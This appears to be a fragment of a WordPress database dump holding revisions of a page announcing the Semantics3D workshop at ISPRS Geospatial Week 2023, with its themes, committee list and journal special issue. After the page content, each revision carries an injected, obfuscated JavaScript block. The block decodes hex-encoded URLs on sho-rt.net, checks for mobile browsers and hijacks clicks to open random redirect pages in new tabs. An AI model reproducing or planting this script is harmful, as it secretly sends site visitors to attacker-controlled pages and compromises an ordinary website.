\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences','','inherit','closed','closed','','2795-revision-v1','','','2022-10-14 17:33:09','2022-10-14 17:33:09','',2795,'https://gsw2023.com/?p=2842',0,'revision','',0),
(2843,1,'2022-10-14 17:33:59','2022-10-14 17:33:59','','m3','','inherit','open','closed','','m3-2','','','2022-10-14 17:33:59','2022-10-14 17:33:59','',2795,'https://gsw2023.com/wp-content/uploads/2022/10/m3-1.jpg',0,'attachment','image/jpeg',0),
(2844,1,'2022-10-14 17:38:33','2022-10-14 17:38:33','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2841\" img_size=\"800x800\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Automated 3D reconstruction and the extraction of semantic information from images and image sequences are important research topics in Photogrammetry, Remote Sensing, GIS, and Computer Vision. This workshop is a follow-up to the first event under the same name embedded in the ISPRS Geospatial Week 2019 in Enschede. It will bring together experts working in photogrammetric 3D reconstruction, semantic interpretation of imagery and image sequence analysis to discuss recent developments, the potential of various data sources, and future trends in 3D reconstruction and information extraction from imagery. Its focus is on methodological research. Semantic3D will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"50\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2843\" img_size=\"1600x600\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Feature extraction, stereo/multi-view sparse matching, dense image matching</strong></h6>\n</li>\n<li>\n<h6><strong>3D data acquisition and surface reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Automatic detection and 3D reconstruction of objects using data from terrestrial, airborne or satellite sensors</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning and other supervised methods for 3D reconstruction and for the semantic interpretation of 3D scenes based on images, point clouds, or surface meshes</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-source, multi-view, multi-temporal, multi-modal image analysis: Integration of data from multiple viewpoints or multiple sensors for automated object detection and 3D reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of existing interpreted data such as historical maps or urban GIS for object detection and reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty estimation and uncertainty propagation in 3D reconstruction and classification</strong></h6>\n</li>\n<li>\n<h6><strong>Methods for the generation and update of high-resolution 3D city models and road databases</strong></h6>\n</li>\n<li>\n<h6><strong>Object detection, recognition, 3D reconstruction and tracking in the context of robotics or autonomous driving and mobile mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Dynamic scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Change detection in image time series and 3D point clouds</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of images, motion and vehicle models</strong></h6>\n</li>\n<li>\n<h6><strong>Video analysis for security/surveillance tasks</strong></h6>\n</li>\n<li>\n<h6><strong>Explainable machine learning for geospatial applications</strong></h6>\n</li>\n<li>\n<h6><strong>Methods to overcome data biases, limited labels, and weak labels</strong></h6>\n</li>\n<li>\n<h6><strong>Evaluation of performance, speed, reliability, robustness, and generalization ability of methods</strong></h6>\n</li>\n</ul>\n<h6></h6>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Ksenia Bittner, German Aerospace Center(DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Böhm, University College London, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Max Coenen, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Pablo d\'Angelo, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Friedrich Fraundorfer, Graz University of Technology, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, Technische Universität Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Norbert Haala, University of Stuttgart, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Dorota Iwanszczuk, TU Darmstadt, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Arpan Kusari, University of Michigan, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Florent Lafarge, INRIA, Sophia Antipolis, France</strong></h6>\n</li>\n<li>\n<h6><strong>Loic Landrieu, National Geographical Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Max Mehltretter, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Sander Oude Elberink, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Charlotte Pelletier, University of Southern Brittany, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ribana Roscher, University of Bonn, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Franz Rottensteiner, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Marc Russwurm, Federal Institute of Technology (EPFL), Lausanne, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Maria Vakalopoulou, University of Paris-Saclay, France</strong></h6>\n</li>\n<li>\n<h6><strong>Bruno Vallet, Institut Géographique National (IGN), France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Dirk Wegner, University of Zurich, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martin Weinmann, Karlsruhe Institute of Technology, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Wen Xiao, China University of Geosciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Michael Ying Yang, University of Twente, The Netherlands</strong></h6>\n</li>\n</ul>\n<h6><strong>Others tba.</strong></h6>\n<h6></h6>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>WG II/2 Point cloud acquisition and processing </strong></h6>\n</li>\n<li>\n<h6><strong>WG II/3 3D scene reconstruction for modeling &amp; mapping</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/4 AI / ML for geospatial data</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/5 Temporal geospatial data understanding</strong></h6>\n</li>\n</ul>\n<h6><strong><u> </u></strong></h6>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the journal PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064</a>; current impact factor: 3.292). The papers being accepted after the peer-review process of the journal will appear in a special issue of that journal dedicated to this workshop. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences','','inherit','closed','closed','','2795-revision-v1','','','2022-10-14 17:38:33','2022-10-14 17:38:33','',2795,'https://gsw2023.com/?p=2844',0,'revision','',0),
